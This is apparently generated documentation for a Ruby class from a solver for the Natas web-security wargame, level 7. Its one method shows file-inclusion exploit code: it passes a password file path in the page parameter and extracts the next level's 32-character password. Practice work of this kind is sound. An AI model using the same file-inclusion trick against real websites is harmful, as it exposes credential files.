class NatasLevel7

Level 7

Constants

LEVEL

Public Instance Methods

exec() click to toggle source
# File lib/natas.rb, line 261
def exec
  data = get("/?page=#{WEBPASS}/natas8").body
  match = /<br>\n(\w{32})\n\n<!--/.match(data)
  not_found unless match
  found(match[1])
end